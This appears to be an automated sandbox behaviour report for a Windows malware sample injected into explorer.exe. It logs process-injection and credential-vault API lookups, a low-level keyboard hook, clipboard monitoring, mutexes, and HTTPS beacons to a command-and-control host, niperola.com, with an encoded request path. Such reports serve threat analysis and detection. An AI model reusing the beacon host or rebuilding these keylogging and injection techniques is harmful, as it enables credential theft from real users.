Module (289)
»
Operation Module Additional Information Success Count Logfile
Load ntdll.dll base_address = 0x0 True 1
Fn
Load KERNEL32.dll base_address = 0x0 True 1
Fn
Load AVIFIL32.dll base_address = 0x0 True 1
Fn
Load ADVAPI32.dll base_address = 0x7ff976f80000 True 1
Fn
Load SHLWAPI.dll base_address = 0x7ff977360000 True 1
Fn
Load USER32.dll base_address = 0x7ff9757b0000 True 1
Fn
Load PSAPI.DLL base_address = 0x7ff977820000 True 1
Fn
Load ole32.dll base_address = 0x7ff977b60000 True 1
Fn
Load ADVAPI32.DLL base_address = 0x7ff976f80000 True 1
Fn
Load SHELL32.dll base_address = 0x7ff975900000 True 1
Fn
Load WININET.dll base_address = 0x7ff96b080000 True 1
Fn
Load vaultcli.dll base_address = 0x7ff968360000 True 1
Fn
Get Handle Unknown module name base_address = 0x7ff62aec0000 True 1
Fn
Get Handle KERNEL32.DLL base_address = 0x7ff977ab0000 True 5
Fn
Get Handle NTDLL.DLL base_address = 0x7ff977f30000 True 2
Fn
Get Handle kernelbase base_address = 0x7ff9753d0000 True 2
Fn
Get Handle ADVAPI32.DLL base_address = 0x7ff976f80000 True 3
Fn
Get Filename AVIFIL32.dll process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 True 2
Fn
Get Address - function = NtCreateSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = NtUnmapViewOfSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = NtMapViewOfSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ZwOpenProcessToken, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ZwClose, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ZwQueryInformationToken, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ZwOpenProcess, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = NtQuerySystemInformation, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RtlNtStatusToDosError, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ZwQueryInformationProcess, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RtlImageDirectoryEntryToData, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = _wcsupr, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = _strupr, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = memmove, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = bsearch, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = _vsnwprintf, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = _strlwr, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = atoi, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = strstr, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = wcscpy, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ZwQueryKey, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RtlFreeUnicodeString, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = sprintf, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = _snprintf, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = memset, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = memcpy, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = strcpy, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RtlAdjustPrivilege, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = mbstowcs, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RtlImageNtHeader, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = memcmp, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = __C_specific_handler, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = __chkstk, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetLocalTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenProcess, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = VirtualQueryEx, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateRemoteThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetModuleFileNameW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetVersion, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SetEndOfFile, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RemoveDirectoryW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetTempFileNameA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = DeleteCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CloseHandle, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WriteProcessMemory, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateFileA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcmpiA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetModuleFileNameA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetCurrentProcess, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcmpA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetModuleHandleA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateFileMappingA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = MapViewOfFile, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Sleep, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GlobalLock, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrlenA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GlobalAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GlobalUnlock, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = HeapAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcpyA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetLastError, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = HeapFree, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RemoveDirectoryA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = DeleteFileA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcatA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WriteFile, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateDirectoryA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = HeapDestroy, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = HeapCreate, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SetEvent, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = HeapReAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetTickCount, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FindNextFileW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CopyFileW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SetWaitableTimer, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LocalAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetCurrentThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetCurrentThreadId, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrlenW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateEventA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetWindowsDirectoryA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = DeleteFileW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateDirectoryW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateWaitableTimerA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetTempPathA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FindFirstFileW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LocalFree, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = TerminateProcess, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SuspendThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WaitForMultipleObjects, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ResumeThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcpyW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FileTimeToSystemTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateFileW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ResetEvent, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SwitchToThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcatW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateProcessW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetFileSize, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetFileAttributesW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WideCharToMultiByte, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LeaveCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SetLastError, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = EnterCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetComputerNameA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateMutexA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenWaitableTimerA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenMutexA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetVolumeInformationA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WaitForSingleObject, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ReleaseMutex, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetComputerNameW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = InitializeCriticalSection, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LoadLibraryExW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = VirtualFree, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetFileAttributesA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenFileMappingA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetExitCodeProcess, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateProcessA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcpynA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LocalReAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = TlsAlloc, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = TlsGetValue, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = TlsSetValue, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = LoadLibraryW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetVersionExW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FreeLibrary, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ReadFile, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SetFilePointer, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Thread32First, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = QueueUserAPC, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenThread, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Thread32Next, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FindFirstFileA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FindNextFileA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = ConnectNamedPipe, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetOverlappedResult, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CancelIo, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = DisconnectNamedPipe, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FlushFileBuffers, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CallNamedPipeA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = CreateNamedPipeA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetSystemTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = WaitNamedPipeA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetCurrentProcessId, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = SleepEx, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = OpenEventA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = lstrcmpiW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = RaiseException, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetSystemInfo, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Process32NextW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = Process32FirstW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = QueueUserWorkItem, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = FindClose, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = GetDriveTypeW, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = VirtualProtectEx, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIStreamRelease, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIStreamWrite, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileOpenA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileCreateStreamA, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIStreamSetFormat, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileExit, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileInit, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIMakeCompressedStream, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address - function = AVIFileRelease, ordinal = 0, address_out = 0x235f830 True 1
Fn
Get Address Unknown module name function = IsWow64Process, address_out = 0x7ff977ace960 True 1
Fn
Get Address Unknown module name function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7ff976f9d610 True 1
Fn
Get Address Unknown module name function = StrRChrA, address_out = 0x7ff977374dd0 True 1
Fn
Get Address Unknown module name function = wsprintfA, address_out = 0x7ff9757d2610 True 1
Fn
Get Address Unknown module name function = RegOpenKeyA, address_out = 0x7ff976f9b9e0 True 1
Fn
Get Address Unknown module name function = RegQueryValueExA, address_out = 0x7ff976f97dd0 True 1
Fn
Get Address Unknown module name function = RegCloseKey, address_out = 0x7ff976f972e0 True 1
Fn
Get Address Unknown module name function = StrToIntExA, address_out = 0x7ff977374e70 True 1
Fn
Get Address Unknown module name function = StrChrA, address_out = 0x7ff977374cc0 True 1
Fn
Get Address Unknown module name function = StrTrimA, address_out = 0x7ff977374e80 True 1
Fn
Get Address Unknown module name function = GetUserNameA, address_out = 0x7ff976faec40 True 1
Fn
Get Address Unknown module name function = EnumProcessModules, address_out = 0x7ff977821040 True 1
Fn
Get Address Unknown module name function = StrStrIW, address_out = 0x7ff97736b260 True 1
Fn
Get Address Unknown module name function = RegEnumValueW, address_out = 0x7ff976f97220 True 1
Fn
Get Address Unknown module name function = RegSetValueExA, address_out = 0x7ff976f82680 True 1
Fn
Get Address Unknown module name function = RegCreateKeyA, address_out = 0x7ff976fc6dc0 True 1
Fn
Get Address Unknown module name function = RegOpenKeyExA, address_out = 0x7ff976f97d70 True 1
Fn
Get Address Unknown module name function = CreateStreamOnHGlobal, address_out = 0x7ff9778570a0 True 1
Fn
Get Address Unknown module name function = PathFindFileNameA, address_out = 0x7ff97736cf30 True 1
Fn
Get Address Unknown module name function = SetWindowsHookExA, address_out = 0x7ff9757b27a0 True 1
Fn
Get Address Unknown module name function = RegisterClassA, address_out = 0x7ff9757d1310 True 1
Fn
Get Address Unknown module name function = CreateWindowExA, address_out = 0x7ff9757d4df0 True 1
Fn
Get Address Unknown module name function = GetWindowLongPtrA, address_out = 0x7ff9757bcae0 True 1
Fn
Get Address Unknown module name function = DefWindowProcA, address_out = 0x7ff977fc3230 True 1
Fn
Get Address Unknown module name function = SetWindowLongPtrA, address_out = 0x7ff9757c61f0 True 1
Fn
Get Address Unknown module name function = GetMessageA, address_out = 0x7ff9757caa50 True 1
Fn
Get Address Unknown module name function = TranslateMessage, address_out = 0x7ff9757c36a0 True 1
Fn
Get Address Unknown module name function = DispatchMessageA, address_out = 0x7ff9757d61e0 True 1
Fn
Get Address Unknown module name function = SetClipboardViewer, address_out = 0x7ff9757e0de0 True 1
Fn
Get Address Unknown module name function = PostMessageA, address_out = 0x7ff9757d4900 True 1
Fn
Get Address Unknown module name function = OpenClipboard, address_out = 0x7ff9757db6c0 True 1
Fn
Get Address Unknown module name function = GetClipboardData, address_out = 0x7ff9757daba0 True 1
Fn
Get Address Unknown module name function = CloseClipboard, address_out = 0x7ff9757e0920 True 1
Fn
Get Address Unknown module name function = StrCmpIW, address_out = 0x7ff97736be50 True 1
Fn
Get Address Unknown module name function = RegNotifyChangeKeyValue, address_out = 0x7ff976f98fd0 True 1
Fn
Get Address Unknown module name function = CoInitializeEx, address_out = 0x7ff9778a3170 True 1
Fn
Get Address Unknown module name function = RegEnumKeyExA, address_out = 0x7ff976f825d0 True 1
Fn
Get Address Unknown module name function = SHGetFolderPathW, address_out = 0x7ff9759e0080 True 1
Fn
Get Address Unknown module name function = PathCombineW, address_out = 0x7ff97736d130 True 1
Fn
Get Address Unknown module name function = PathMatchSpecW, address_out = 0x7ff977374990 True 1
Fn
Get Address Unknown module name function = IsTextUnicode, address_out = 0x7ff976f96c80 True 1
Fn
Get Address Unknown module name function = RegOpenKeyExW, address_out = 0x7ff976f96cb0 True 1
Fn
Get Address Unknown module name function = CryptAcquireContextW, address_out = 0x7ff976f989e0 True 1
Fn
Get Address Unknown module name function = CryptCreateHash, address_out = 0x7ff976f97bf0 True 1
Fn
Get Address Unknown module name function = CryptHashData, address_out = 0x7ff976f97d80 True 1
Fn
Get Address Unknown module name function = CryptGetHashParam, address_out = 0x7ff976f97970 True 1
Fn
Get Address Unknown module name function = CryptDestroyHash, address_out = 0x7ff976f986a0 True 1
Fn
Get Address Unknown module name function = CryptReleaseContext, address_out = 0x7ff976f98ee0 True 1
Fn
Get Address Unknown module name function = PathFindExtensionA, address_out = 0x7ff977374800 True 1
Fn
Get Address Unknown module name function = StrRChrW, address_out = 0x7ff97736dd80 True 1
Fn
Get Address Unknown module name function = CoCreateInstance, address_out = 0x7ff9778b7000 True 1
Fn
Get Address Unknown module name function = FindFirstUrlCacheEntryA, address_out = 0x7ff96b132120 True 1
Fn
Get Address Unknown module name function = StrChrW, address_out = 0x7ff97736a2a0 True 1
Fn
Get Address Unknown module name function = StrStrIA, address_out = 0x7ff97736e1c0 True 1
Fn
Get Address Unknown module name function = FindNextUrlCacheEntryA, address_out = 0x7ff96b107bf0 True 1
Fn
Get Address Unknown module name function = VaultOpenVault, address_out = 0x7ff968362310 True 1
Fn
Get Address Unknown module name function = VaultCloseVault, address_out = 0x7ff9683623a0 True 1
Fn
Get Address Unknown module name function = VaultEnumerateItems, address_out = 0x7ff9683621c0 True 1
Fn
Get Address Unknown module name function = VaultGetItem, address_out = 0x7ff968361ff0 True 2
Fn
Get Address Unknown module name function = VaultFree, address_out = 0x7ff96836e340 True 1
Fn
Get Address Unknown module name function = FindCloseUrlCache, address_out = 0x7ff96b0d2470 True 1
Fn
Get Address Unknown module name function = InternetCanonicalizeUrlA, address_out = 0x7ff96b1a71b0 True 1
Fn
Get Address Unknown module name function = InternetOpenA, address_out = 0x7ff96b0a1400 True 1
Fn
Get Address Unknown module name function = InternetSetStatusCallback, address_out = 0x7ff96b1356e0 True 1
Fn
Get Address Unknown module name function = InternetConnectA, address_out = 0x7ff96b1a78f0 True 1
Fn
Get Address Unknown module name function = HttpOpenRequestA, address_out = 0x7ff96b1d30a0 True 1
Fn
Get Address Unknown module name function = InternetQueryOptionA, address_out = 0x7ff96b0a3cc0 True 1
Fn
Get Address Unknown module name function = InternetSetOptionA, address_out = 0x7ff96b0b7f00 True 1
Fn
Get Address Unknown module name function = HttpSendRequestA, address_out = 0x7ff96b083330 True 1
Fn
Get Address Unknown module name function = CoUninitialize, address_out = 0x7ff9778a2380 True 1
Fn
Get Address Unknown module name function = RegEnumKeyExW, address_out = 0x7ff976f97180 True 1
Fn
Get Address Unknown module name function = InternetReadFile, address_out = 0x7ff96b0a3350 True 1
Fn
Get Address Unknown module name function = HttpQueryInfoA, address_out = 0x7ff96b0b7140 True 1
Fn
Get Address Unknown module name function = InternetCloseHandle, address_out = 0x7ff96b0de110 True 1
Fn
Get Address Unknown module name function = 92, address_out = 0x7ff975b21c90 True 1
Fn
Get Address Unknown module name function = PathIsDirectoryEmptyA, address_out = 0x7ff977376840 True 1
Fn
Get Address Unknown module name function = CoCreateGuid, address_out = 0x7ff9778a2340 True 1
Fn
Get Address Unknown module name function = RegEnumValueA, address_out = 0x7ff976fb0f00 True 1
Fn
Get Address Unknown module name function = HttpAddRequestHeadersA, address_out = 0x7ff96b0ef3e0 True 1
Fn
Get Address Unknown module name function = RegDeleteValueA, address_out = 0x7ff976f82960 True 1
Fn
Create Mapping C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin filename = C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin, protection = PAGE_READONLY, maximum_size = 161 True 1
Fn
Map C:\Users\CIIHMN~1\AppData\Local\Temp\2314.bin process_name = c:\windows\explorer.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (2)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = {D2E83952-8889-7854-A6A3-3A87C8CD7C51}, wndproc_parameter = 122648704 True 1
Fn
Create - class_name = {24B7E16E-39F5-82D0-82EF-D69304F9783D}, wndproc_parameter = 122648336 True 1
Fn
System (51)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1
Fn
Get Clipboard format = 1 False 1
Fn
Sleep duration = -1 (infinite) False 4
Fn
Sleep duration = -1 (infinite) True 18
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 6
Fn
Sleep duration = 60000 milliseconds (60.000 seconds) True 4
Fn
Get Time type = Ticks, time = 110515 True 1
Fn
Get Time type = System Time, time = 2018-11-06 00:26:56 (UTC) True 1
Fn
Get Time type = Ticks, time = 110843 True 1
Fn
Get Time type = Ticks, time = 110859 True 1
Fn
Get Time type = System Time, time = 2018-11-06 00:27:36 (UTC) True 1
Fn
Get Time type = Ticks, time = 151093 True 1
Fn
Get Time type = Ticks, time = 151234 True 2
Fn
Get Time type = System Time, time = 2018-11-06 00:27:38 (UTC) True 1
Fn
Get Time type = Ticks, time = 154562 True 2
Fn
Get Time type = Ticks, time = 164375 True 1
Fn
Get Time type = Ticks, time = 164390 True 1
Fn
Get Time type = System Time, time = 2018-11-06 00:27:49 (UTC) True 1
Fn
Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x74c045c True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (11)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4} True 1
Fn
Create mutex_name = Local\{6C433A47-DB67-7E7B-C560-3F92C994E3E6} True 1
Fn
Create mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D} True 1
Fn
Create mutex_name = Local\{53667D0F-9637-FD89-3837-2A81EC5BFE45} True 1
Fn
Open mutex_name = Local\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE False 1
Fn
Open mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE False 1
Fn
Open mutex_name = Local\{53667D0F-9637-FD89-3837-2A81EC5BFE45}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE False 1
Fn
Open mutex_name = Local\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Open mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Open mutex_name = Local\{53667D0F-9637-FD89-3837-2A81EC5BFE45}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Release mutex_name = Local\{FB999B87-1EC7-E503-005F-32E93403862D} True 1
Fn
Network Behavior
HTTP Sessions (2)
»
Information Value
Total Data Sent 923 bytes
Total Data Received 8 bytes
Contacted Host Count 1
Contacted Hosts niperola.com
HTTP Session #1
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Server Name niperola.com
Server Port 443
Data Sent 447
Data Received 4
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64), access_type = INTERNET_OPEN_TYPE_PRECONFIG, flags = INTERNET_FLAG_ASYNC True 1
Fn
Open Connection protocol = HTTP, server_name = niperola.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif, accept_types = 0, flags = INTERNET_FLAG_CACHE_ASYNC, INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = niperola.com/images/t6PwZYW0/cwkgo0TWfMQHPzKoEhmhJLv/8xMTE7Bjb3/6yiIg6baAjQrmWmCu/oaAKJTAh4aj_/2FdUbObIyhn/toBDPBWCqqthMV/_2Fi6S58Tlr8_2Fc9EnJI/0JJFxlEUO4PkOIv1/mxmKqNdu6KajDSE/8RmL8TP2Um0tgLQM0J/q4I5r7_2B/BO0SxznfuPly89dHTrGO/Jp3FDd.gif False 1
Fn
Read Response size = 4096, size_out = 0 True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Close Session - True 2
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
Server Name niperola.com
Server Port 443
Data Sent 476
Data Received 4
Operation Additional Information Success Count Logfile
